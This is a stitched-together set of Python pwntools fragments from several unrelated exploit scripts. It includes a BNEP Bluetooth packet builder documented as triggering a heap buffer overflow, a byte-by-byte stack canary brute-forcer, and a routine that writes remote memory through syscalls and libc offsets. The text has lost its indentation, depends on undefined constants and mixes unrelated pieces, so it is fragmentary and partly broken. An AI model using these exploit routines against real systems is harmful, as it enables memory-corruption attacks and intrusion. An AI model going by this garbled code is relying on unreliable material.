def get_full_packet(self):
if len(self.data) == 0:
return b''
if self.crc is ErrorCodes.SNSIAS.value:
return self.data
ret = pwn.p8(self.sid)
if self.sub is not None:
ret += pwn.p8(self.sub)
if self.parameter is not None:
ret += self.parameter
return ret
def construct_packet(content):
"""
Constructs a valid BNEP control package with `content` as payload that triggers
the buffer overflow on the heap.
Params:
- `content` - The actual data to pack in the BNEP package
Returns:
A valid BNEP package that contains `content` and triggers the vulnerability
"""
pkt = "" + pwn.p8(BNEP_FRAME_CONTROL | 128)
pkt += pwn.p8(BNEP_SETUP_CONN_REQ_MSG) + "\x00" + content
return pkt
def find_canary():
canary = b""
for l in range(KEY_LEN):
for c in range(256):
pr = pwn.process(remote_binary)
try:
pr.writelineafter("Please enter the length of the entry:\n> ",
str(BUF_LEN + len(canary) + 1))
pr.writelineafter("Input>",
b"A" * BUF_LEN + canary + pwn.p8(c))
line = pr.readline()
if "Stack Smashing Detected" in line:
continue
canary += pwn.p8(c)
break
finally:
pr.close()
return canary
def writeb(offset, ch):
p = pwn.remote(HOST, PORT)
pwn.context.log_level = 'INFO'
_, shm_base = syscall(p, SYS_shmat, mid, 0x0, 0)
libc_base = shm_base - 0xBB8000
src = libc_base + next(libc.search(pwn.p8(ch)))
syscall(p, SYS_prctl, PR_SET_NAME, src, 0)
syscall(p, SYS_prctl, PR_GET_NAME, shm_base + offset, 0)
pwn.context.log_level = 'DEBUG'
p.close()
def _create_hszf_header(payload, sender, reciever):
return pwn.p32(len(payload) + 2, endian='big') + pwn.p16(
1, endian='big') + pwn.p8(sender) + pwn.p8(reciever)